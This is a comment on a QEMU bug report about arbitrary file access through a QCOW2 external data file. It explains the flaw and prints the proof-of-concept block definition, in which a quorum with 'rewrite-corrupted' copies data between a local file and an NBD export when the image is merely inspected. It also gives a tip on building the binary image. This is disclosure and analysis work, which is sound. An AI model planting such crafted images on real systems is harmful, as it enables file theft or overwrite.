Comment 50 for bug 2059809

Revision history for this message
Martin Kaesberger (mkaesberger) wrote (last edit ): Re: Arbitrary file access through QCOW2 external data file

Actually Qemu behaves as intended and it should be difficult to change the behavior. Access normally looks like this:

qcow2 ───> file

Qemu initializes the Qcow2 driver, which reads and writes from a file. The info command does not initiate a write operation, but only outputs the settings/properties and closes the driver again.
If a data file is used, only the metadata are read from the file and the accesses to guest clusters are passed on to the data file. I have set up the following chain in the proof of concept:

qcow2 ┬─x file
      │ ┌──> raw ──> file
      └──> qcow2 ───> quorum ┤
                             └──> raw ──> nbd

The formatted definition looks like this:
{
    "driver": "qcow2",
    "read-only": false,
    "file": {
        "driver": "quorum",
        "read-only": false,
        "rewrite-corrupted": true,
        "read-pattern": "quorum",
        "vote-threshold": 1,
        "children": [
            {
                "driver": "raw",
                "read-only": false,
                "file": {
                    "filename": "file-1.raw"
                }
            },
            {
                "driver": "raw",
                "file": {
                    "driver": "nbd",
                    "host": "localhost",
                    "port": 1234,
                    "export": "data"
                }
            }
        ]
    }
}

A Qcow2 driver is initialized as the data file, but it does not have a file as its source, but a quorum. This has two important properties: 1) `read-pattern: quorum` ensures that all children must be read and a majority decision must be made on the correct data. 2) `rewrite-corrupted: true` ensures that incorrect data are corrected. Because the Qcow2 driver has to read the header for initialization, both children are read, but they differ due to a lack of knowledge about the content. The quorum therefore initiates a correction of the incorrect data. With two children, this results in the data being transferred from the second to the first. With more children, it should be based on the majority. In the proof of concept, I have used two raw devices, one supported by a file and one with an NBD driver. Depending on the order of the children, data is either written from the NBD device to a file or transferred from the file to the NBD. This happens just because of the initialization of the driver to introspect the image file.

Arnaud Morin: Whoops, I used an extensions to the POSIX standard to generate binary data. `printf "\x04"` doesn't work in dash and the escape sequences end up in multiple locations in the file. Either generate the file in a busybox/ Alpine based container or use bash instead.

It should have succeeded if you see `Image is not in qcow2 format`.